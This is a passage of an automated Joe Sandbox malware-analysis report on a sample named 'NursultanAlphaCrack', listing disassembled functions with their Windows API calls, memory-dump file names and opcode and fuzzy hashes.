                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: DeleteFile$_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 2643169976-0
                                                                                        • Opcode ID: bce78474c54c4860e8cb01404f384ead84a68eb319aa96a16205fbf39ee71f42
                                                                                        • Instruction ID: 9d2359b0ed26501533ee749cc07fa419edd0333629cb84c610a99d1fdc65db84
                                                                                        • Opcode Fuzzy Hash: bce78474c54c4860e8cb01404f384ead84a68eb319aa96a16205fbf39ee71f42
                                                                                        • Instruction Fuzzy Hash: CFE0D83114021D6BDB015F60DC45FEA379CAF2C3C6F484026B944D6050EF71DEC4DA50
                                                                                        APIs
                                                                                        • GdiplusShutdown.GDIPLUS(?,?,?,?,001F2641,000000FF), ref: 001DACB0
                                                                                        • CoUninitialize.COMBASE(?,?,?,?,001F2641,000000FF), ref: 001DACB5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: GdiplusShutdownUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 3856339756-0
                                                                                        • Opcode ID: 6840381632a80871394c0a83da98c6313ec1a3984362cd3b3df2193e39ea66c1
                                                                                        • Instruction ID: 2d4e879b4c63dd6819297fbdd955d2c21228fb6237d6db1c96094aed4c5ccd58
                                                                                        • Opcode Fuzzy Hash: 6840381632a80871394c0a83da98c6313ec1a3984362cd3b3df2193e39ea66c1
                                                                                        • Instruction Fuzzy Hash: A4E06572504650EFC711DB58EC46B55FBA9FB48B20F004266F416D3760CB746841CA90
                                                                                        APIs
                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,001CA23A,?,001C755C,?,?,?,?), ref: 001CA254
                                                                                          • Part of subcall function 001CBB03: _wcslen.LIBCMT ref: 001CBB27
                                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,001CA23A,?,001C755C,?,?,?,?), ref: 001CA280
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesFile$_wcslen
                                                                                        • String ID:
                                                                                        • API String ID: 2673547680-0
                                                                                        • Opcode ID: a08afee060a968b4951be9b3c764e79d17f07f4c13cb3ab22b5a2941050de2e9
                                                                                        • Instruction ID: 054f43604159751fecaf5922a1b205bf13b8b2508bf782731be37212a8f62531
                                                                                        • Opcode Fuzzy Hash: a08afee060a968b4951be9b3c764e79d17f07f4c13cb3ab22b5a2941050de2e9
                                                                                        • Instruction Fuzzy Hash: D4E092325001286BCB51AB64DC09FE97798EF283E6F044262FD54E32D4DB70DE84CAA0
                                                                                        APIs
                                                                                        • _swprintf.LIBCMT ref: 001DDEEC
                                                                                          • Part of subcall function 001C4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001C40A5
                                                                                        • SetDlgItemTextW.USER32(00000065,?), ref: 001DDF03
                                                                                          • Part of subcall function 001DB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 001DB579
                                                                                          • Part of subcall function 001DB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001DB58A
                                                                                          • Part of subcall function 001DB568: IsDialogMessageW.USER32(00010440,?), ref: 001DB59E
                                                                                          • Part of subcall function 001DB568: TranslateMessage.USER32(?), ref: 001DB5AC
                                                                                          • Part of subcall function 001DB568: DispatchMessageW.USER32(?), ref: 001DB5B6
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                        • String ID:
                                                                                        • API String ID: 2718869927-0
                                                                                        • Opcode ID: 1703479f418531ed7ecd66838b380db34de29dde05be6de2e3dce4e46ed23a2c
                                                                                        • Instruction ID: ad0ca6aa347ecd75b82245b243d755fbf9b87b884a76f1ca5387b96a33c7c47c
                                                                                        • Opcode Fuzzy Hash: 1703479f418531ed7ecd66838b380db34de29dde05be6de2e3dce4e46ed23a2c
                                                                                        • Instruction Fuzzy Hash: 66E092B641434866DF02ABA0EC0AFDF3BAC5B25785F040856B245DA1A3DB78EA608661
                                                                                        APIs
                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 001D0836
                                                                                        • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,001CF2D8,Crypt32.dll,00000000,001CF35C,?,?,001CF33E,?,?,?), ref: 001D0858
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryLibraryLoadSystem
                                                                                        • String ID:
                                                                                        • API String ID: 1175261203-0
                                                                                        • Opcode ID: d03c1d38f3ee5788932674b9cc9018f8cc988eab2f3c0dd0d38de1fc8e1b6596
                                                                                        • Instruction ID: 94e0e37d992fb30b069b365ff85f78428a0bb69874e4ff5e5ac81b660b042ee6
                                                                                        • Opcode Fuzzy Hash: d03c1d38f3ee5788932674b9cc9018f8cc988eab2f3c0dd0d38de1fc8e1b6596
                                                                                        • Instruction Fuzzy Hash: 91E012768001186ADF11A794DC49FEA77ACAF19391F0400667645D2104DB74EA84CAA0
                                                                                        APIs
                                                                                        • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 001DA3DA
                                                                                        • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 001DA3E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: BitmapCreateFromGdipStream
                                                                                        • String ID:
                                                                                        • API String ID: 1918208029-0
                                                                                        • Opcode ID: 2c02796499e9c217cab7b9f508360917cda2fdc69ad66f480d5f48ddfcbc62c8
                                                                                        • Instruction ID: c898d8e209b1a2b8818e551ec45dd98c68cd465bd078dd69c8f9c3f3ff2c44bb
                                                                                        • Opcode Fuzzy Hash: 2c02796499e9c217cab7b9f508360917cda2fdc69ad66f480d5f48ddfcbc62c8
                                                                                        • Instruction Fuzzy Hash: FEE0ED71500218EBCB10EF55C541799BBE8EF14361F10815BA98697341E374BF04DB91
                                                                                        APIs
                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 001E2BAA
                                                                                        • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 001E2BB5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                        • String ID:
                                                                                        • API String ID: 1660781231-0
                                                                                        • Opcode ID: b398fa642310e5e2f9377943055d879e240a904ebbd75ca63c3197c8b901e94f
                                                                                        • Instruction ID: 883081661d210be806c6cf63dab2a39f6e35353d8c151d97d25eb2abdfc33558
                                                                                        • Opcode Fuzzy Hash: b398fa642310e5e2f9377943055d879e240a904ebbd75ca63c3197c8b901e94f
                                                                                        • Instruction Fuzzy Hash: FAD0A775154ED0244C242AB3283646C334E6D617757A00696E031878C1DF7290809011
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemShowWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3351165006-0
                                                                                        • Opcode ID: ed985a81419b382a48fd417d20c96caea45ad84dd47e512398486467ff50c56f
                                                                                        • Instruction ID: 88997e03772d027593a6235b4822ca7926f3acb73a4137b63d516f1ab34dd6c3
                                                                                        • Opcode Fuzzy Hash: ed985a81419b382a48fd417d20c96caea45ad84dd47e512398486467ff50c56f
                                                                                        • Instruction Fuzzy Hash: E8C0123205C200BECB018BF4EC0DC2BBBA8ABA5312F04C908B0A9C0060C23CC120DF11
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: 62bb55c33b0d03967fa52a2be21d5cb184d60ed811eb2a291d120633de942994
                                                                                        • Instruction ID: f79c3976de7f3d7e7628d908a8fe47df7aa90dc0048ab80a55d5fc5c3a4e7bbb
                                                                                        • Opcode Fuzzy Hash: 62bb55c33b0d03967fa52a2be21d5cb184d60ed811eb2a291d120633de942994
                                                                                        • Instruction Fuzzy Hash: 00C18370A80254ABEF15DF64C498FB97BA5AF26310F0801BDEC569B297DB30DD44CB61
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: 7c2d0b11cf487c60c1f2723a9ed53a6c045b90ae442a77a64230c700ebc7d729
                                                                                        • Instruction ID: 72b04543805b434cc2b3293afce18a7cbc2be525475f808db6871fad20d2455d
                                                                                        • Opcode Fuzzy Hash: 7c2d0b11cf487c60c1f2723a9ed53a6c045b90ae442a77a64230c700ebc7d729
                                                                                        • Instruction Fuzzy Hash: FE71B271140B849EDB25DB74C855EEBB7E5AB35301F40482EE6BB87242DB32AA44CF11
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 001C8289
                                                                                          • Part of subcall function 001C13DC: __EH_prolog.LIBCMT ref: 001C13E1
                                                                                          • Part of subcall function 001CA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 001CA598
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog$CloseFind
                                                                                        • String ID:
                                                                                        • API String ID: 2506663941-0
                                                                                        • Opcode ID: dcd81465dd6675a65ceab99344d1f4e4cf71dbcf5c7718b34c3b487323b23f4b
                                                                                        • Instruction ID: 5158209d9bffb83b7156e3cc106c14b45048d0fa6d98aad839b3b253c4c54982
                                                                                        • Opcode Fuzzy Hash: dcd81465dd6675a65ceab99344d1f4e4cf71dbcf5c7718b34c3b487323b23f4b
                                                                                        • Instruction Fuzzy Hash: FF4196719446589ADB24EBA0CC95FE9B7A8BF30304F4414EFE18A57183EB71DE85CB50
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 001C13E1
                                                                                          • Part of subcall function 001C5E37: __EH_prolog.LIBCMT ref: 001C5E3C
                                                                                          • Part of subcall function 001CCE40: __EH_prolog.LIBCMT ref: 001CCE45
                                                                                          • Part of subcall function 001CB505: __EH_prolog.LIBCMT ref: 001CB50A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: 0c116f51ca657d6baffcd1b15254547bdca7d72c28c8af1b86c7e875334e1601
                                                                                        • Instruction ID: 78fd1b1ee66443c944762416b449e3cfd1db4aff75744d354477a4e9d6f9edd2
                                                                                        • Opcode Fuzzy Hash: 0c116f51ca657d6baffcd1b15254547bdca7d72c28c8af1b86c7e875334e1601
                                                                                        • Instruction Fuzzy Hash: 0B4149B0905B409EE724DF798885AE6FBE5BF29300F54492ED5FF87282CB316654CB50
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 001C13E1
                                                                                          • Part of subcall function 001C5E37: __EH_prolog.LIBCMT ref: 001C5E3C
                                                                                          • Part of subcall function 001CCE40: __EH_prolog.LIBCMT ref: 001CCE45
                                                                                          • Part of subcall function 001CB505: __EH_prolog.LIBCMT ref: 001CB50A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: b240d06736619d5cacee85f50ad9e46c5e105458164984970fee34a1be0de4b8
                                                                                        • Instruction ID: 63be8a60bf5a55635ad965b65b3e1b5af5908cb564ffcb09eb5a63deb22d39cb
                                                                                        • Opcode Fuzzy Hash: b240d06736619d5cacee85f50ad9e46c5e105458164984970fee34a1be0de4b8
                                                                                        • Instruction Fuzzy Hash: A64145B0905B40AEE724DF798885AE6FBE5BF29300F54492ED5FE83282CB316654CB50
                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 001DB098
                                                                                          • Part of subcall function 001C13DC: __EH_prolog.LIBCMT ref: 001C13E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: 7bcf6e26fbb85f9635a40540957c2f50dbca092fea924ee0a479138a3b17f770
                                                                                        • Instruction ID: caf842ad9573ccb8433398d309f6a5ab315a93eae2a01f596c1c7c1d293a13d0
                                                                                        • Opcode Fuzzy Hash: 7bcf6e26fbb85f9635a40540957c2f50dbca092fea924ee0a479138a3b17f770
                                                                                        • Instruction Fuzzy Hash: B3316B71C04249EECF15DFA5D991AEEBBB4AF29304F10449FE40AB7242D775AE04CB61
                                                                                        APIs
                                                                                        • GetProcAddress.KERNEL32(00000000,001F3A34), ref: 001EACF8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc
                                                                                        • String ID:
                                                                                        • API String ID: 190572456-0
                                                                                        • Opcode ID: 84c93131b9221e2bd87fd955947e34aecd8bda26d7aa00a26ffbb4125c6a0f8f
                                                                                        • Instruction ID: a4b327f59c1ac5b7cc34347cf69e4b186863c3b01c01de4e09c1922980c52ab7
                                                                                        • Opcode Fuzzy Hash: 84c93131b9221e2bd87fd955947e34aecd8bda26d7aa00a26ffbb4125c6a0f8f
                                                                                        • Instruction Fuzzy Hash: A7113A33600A656F9B269E5AEC4096E73D5AF807207664220FC15AB664D730FC41C7D2
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: H_prolog
                                                                                        • String ID:
                                                                                        • API String ID: 3519838083-0
                                                                                        • Opcode ID: e4e49659e97e92dccb48fce0bb8f62411d0c48ded9edb0dafa531fedd0359879
                                                                                        • Instruction ID: f8b9cf2aad09e38ddd9623c7eb24611344b9465b0fbe2f0041a0a2ab76141aa7
                                                                                        • Opcode Fuzzy Hash: e4e49659e97e92dccb48fce0bb8f62411d0c48ded9edb0dafa531fedd0359879
                                                                                        • Instruction Fuzzy Hash: 02018233900568ABCF21ABA8CC85FDEB771BFB8750B05412DE812BB252DB34DD0086A0
                                                                                        APIs
                                                                                          • Part of subcall function 001EB136: RtlAllocateHeap.NTDLL(00000008,001F3A34,00000000,?,001E989A,00000001,00000364,?,?,?,001CD984,?,?,?,00000004,001CD710), ref: 001EB177
                                                                                        • _free.LIBCMT ref: 001EC4E5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1363592461.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1363575778.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363742143.00000000001F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.00000000001FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363759988.0000000000222000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1363805105.0000000000223000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_1c0000_NursultanAlphaCrack.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap_free
                                                                                        • String ID:
                                                                                        • API String ID: 614378929-0
                                                                                        • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
